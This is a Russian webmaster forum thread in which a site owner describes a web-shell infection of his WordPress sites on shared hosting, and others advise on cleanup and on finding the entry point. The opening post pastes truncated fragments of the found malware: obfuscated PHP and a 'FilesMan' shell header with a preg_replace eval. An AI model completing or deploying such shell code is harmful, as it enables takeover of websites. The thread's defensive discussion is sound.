Загрузили вриус, сайт на WP

Playerror
На сайте с 28.09.2008
Offline
152
695

Случилась проблема. Предыстория: на хостинге 4 сайта, один из с них с небольшой посещалкой остальные нет. Ко всем прикручена яндекс метрика. И вот неделю назад на сайтах где нет трафика стали появляются заходы со 100% отказами. Причем на все стразу и одинаковое количество. Я сначала не обратил внимания, а потом увидел в файлах темы одного сайта файл под названием типа sys.php , который я туда не ложил.

В файле этом вот такая макаронина:

<?php ${"\x47L\x4f\x42\x41\x4c\x53"}["\x68u\x77\x69\x76\x63\x61\x71wk\x79\x79"]="ips";${"GL\x4f\x42

А так же файл с таким:

<?php 

$auth_pass = "";
$color = "#df5";
$default_action = "FilesMan";
$default_charset = "Windows-1251";
preg_replace("/.*/e","x65x76x61x6Cx

Вопрос: могут взломав один сайт залить файлы на другие мои сайты на этом хостинге ?

И как в htaccess ограничить заливку php файлов на хостинг ?

[umka]
На сайте с 25.05.2008
Offline
456
#1
Playerror:
Вопрос: могут взломав один сайт залить файлы на другие мои сайты на этом хостинге ?

На другие ваши сайты на том же аккаунте — да.

Playerror:
И как в htaccess ограничить заливку php файлов на хостинг ?

Никак. Разве что, запретить в .htaccess доступ к дырявым скриптам.

Лог в помощь!
SeVlad
На сайте с 03.11.2008
Offline
1609
#2
Playerror:
И как в htaccess ограничить заливку php файлов на хостинг ?

Не о том думаешь. Совсем не о том. Думай о дыре, через которую это возможно стало сделать.

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
Playerror
На сайте с 28.09.2008
Offline
152
#3
SeVlad:
Не о том думаешь. Совсем не о том. Думай о дыре, через которую это возможно стало сделать.

А чего о ней думать, если я не знаю как её искать.

Предполагаю, что из-за простого пароля на одном из сайтов т.к. там просто движок был установлен для экспериментов.

А могли испортить как нибудь БД ? Просто если в БД нет никаких вирусов и т.п., то я мог бы просто удалить все с хостинга и по новой перезалить.

rovalans
На сайте с 09.08.2007
Offline
143
#4

Да, дело плохо. Все теперь надо проверять и то не факт, что дыру найдете. Могли в мускуль иньекцию сделать.

Выход искать спеца, что дырень найти.

Символ #, часто называемый "решеткой", "знаком номера" на самом деле имеет официальное название - октоторп.
SeVlad
На сайте с 03.11.2008
Offline
1609
#5
Playerror:
А чего о ней думать, если я не знаю как её искать.

В соседнем разделе 100500 раз описано и рассказано.

Но чтобы долго не метаться - см закреплённый топик (первых 3 стр достаточно) и этот и этот то же можно.

А так же ссылки из стартпоста со слов "Дополнения к ВП".

Playerror:
то я мог бы просто удалить все с хостинга и по новой перезалить.

Всё те же файлы с дырами? :)) Ну-ну.

Да, в БД может быть шелл, но это не так часто встречается.

R
На сайте с 24.01.2008
Offline
180
#6
Playerror:

Вопрос: могут взломав один сайт залить файлы на другие мои сайты на этом хостинге ?

Да, конечно могут.

И как в htaccess ограничить заливку php файлов на хостинг ?

Даже если вы установите правила в файл htaccess его самого могут заменить, нужно искать источник, а не воевать с последствиями.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
Playerror
На сайте с 28.09.2008
Offline
152
#7

Спасибо за советы.

Удалил файлы вируса, проверил ai-bolit, а потом в логах наблюдал интересную картину, как кто-то постоянно дергает эти файлы а в замен 404. Но через день злоумышленник как-то залил свой вирус снова. :)

На одном из сайтов в логах 10К строчек таких

159.253.149.146-static.reverse.softlayer.com - - [04/Nov/2014:08:37:24 +0300] "POST /wp-login.php HTTP/1.0" 403 214 "-" "-"

Прочитал в интернетах, что это shell g , вроде базу не трогает. Так значит я удалю фри шаблон, из бэкапа перезалью шаблон основного сайта + применю методы безопасности предложенные в советах и буду смотреть, как на этот раз удастся или нет залить шел снова.

Думаю, что это все было из-за того, что на хостинге был движок с паролем 12345, но за то я получил ценный опыт.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий